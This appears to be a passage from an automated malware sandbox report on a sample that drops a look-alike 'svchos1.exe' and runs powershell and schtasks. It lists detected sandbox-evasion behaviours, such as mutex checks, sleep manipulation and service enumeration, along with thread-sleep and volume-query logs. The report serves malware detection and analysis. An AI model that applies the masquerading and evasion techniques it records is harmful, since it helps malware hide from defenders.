Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0384D590	28_2_0384D590
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0384DB80	28_2_0384DB80
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0315D590	33_2_0315D590
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 33_2_0315DB80	33_2_0315DB80

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\Public\Documents\MM\svchos1.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_28-106052

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_03851A50 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Sleep,

28_2_03851A50

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: LocalAlloc,LocalAlloc,OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LocalAlloc,EnumServicesStatusA,lstrlen,OpenServiceA,QueryServiceConfigA,LocalAlloc,QueryServiceConfigA,QueryServiceConfig2A,LocalAlloc,QueryServiceConfig2A,lstrcat,lstrcat,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalFree,LocalFree,LocalFree,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,		28_2_03849930
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: LocalAlloc,LocalAlloc,OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LocalAlloc,EnumServicesStatusA,lstrlen,OpenServiceA,QueryServiceConfigA,LocalAlloc,QueryServiceConfigA,QueryServiceConfig2A,LocalAlloc,QueryServiceConfig2A,lstrcat,lstrcat,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalFree,LocalFree,LocalFree,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,		33_2_03159930

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\[System Process]12.exe	Window / User API: threadDelayed 2606	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Window / User API: foregroundWindowGot 1767	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Window / User API: threadDelayed 1346	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	Window / User API: foregroundWindowGot 1763	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6393
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 519
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6168
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 487
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7412
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2337
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8189
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1557
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8208
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1288
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8131
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1403
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7522
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2178
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7045
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2651

Source: C:\Users\Public\Documents\MM\svchos1.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_28-106424

Source: C:\Users\Public\Documents\MM\svchos1.exe	API coverage: 4.9 %
Source: C:\Users\Public\Documents\MM\svchos1.exe	API coverage: 3.2 %

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 33_2_0315DB80

33_2_0315DB80

Source: C:\Users\user\Desktop\[System Process]12.exe TID: 5312	Thread sleep count: 2606 > 30	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 5312	Thread sleep time: -2084800s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8016	Thread sleep time: -92000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8016	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8016	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8016	Thread sleep time: -44000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8016	Thread sleep time: -51000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8020	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8020	Thread sleep time: -3100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8020	Thread sleep time: -110000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8016	Thread sleep time: -144000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8016	Thread sleep time: -112000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8016	Thread sleep time: -84000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8020	Thread sleep time: -232000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8020	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8016	Thread sleep time: -48000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8016	Thread sleep time: -140000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8008	Thread sleep count: 60 > 30	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8008	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8020	Thread sleep time: -280000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8020	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8020	Thread sleep time: -126000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8020	Thread sleep time: -272000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8020	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8020	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8020	Thread sleep time: -80000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8016	Thread sleep time: -143000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8020	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8020	Thread sleep time: -85000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8016	Thread sleep time: -54000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8020	Thread sleep time: -155000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8020	Thread sleep time: -165000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8020	Thread sleep time: -140000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8020	Thread sleep time: -48000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 5312	Thread sleep count: 52 > 30	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 5312	Thread sleep time: -41600s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 5096	Thread sleep count: 1346 > 30	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 5096	Thread sleep time: -1076800s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 348	Thread sleep count: 56 > 30	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8056	Thread sleep count: 262 > 30	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8056	Thread sleep time: -786000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe TID: 8044	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1956	Thread sleep count: 6393 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1000	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1904	Thread sleep count: 519 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4736	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4392	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3692	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7804	Thread sleep count: 7412 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7808	Thread sleep count: 2337 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7896	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7848	Thread sleep count: 8189 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7852	Thread sleep count: 1557 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7900	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\Public\Documents\MM\svchos1.exe TID: 7736	Thread sleep count: 128 > 30
Source: C:\Users\Public\Documents\MM\svchos1.exe TID: 7736	Thread sleep time: -102400s >= -30000s
Source: C:\Users\Public\Documents\MM\svchos1.exe TID: 2276	Thread sleep count: 41 > 30
Source: C:\Users\Public\Documents\MM\svchos1.exe TID: 7856	Thread sleep count: 116 > 30
Source: C:\Users\Public\Documents\MM\svchos1.exe TID: 7856	Thread sleep time: -92800s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5200	Thread sleep count: 8208 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4460	Thread sleep count: 1288 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3764	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2132	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4340	Thread sleep count: 7522 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4340	Thread sleep count: 2178 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6188	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6252	Thread sleep count: 7045 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep count: 2651 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3720	Thread sleep time: -6456360425798339s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Users\Public\Documents\MM\svchos1.exe	Last function: Thread delayed
Source: C:\Users\Public\Documents\MM\svchos1.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\[System Process]12.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
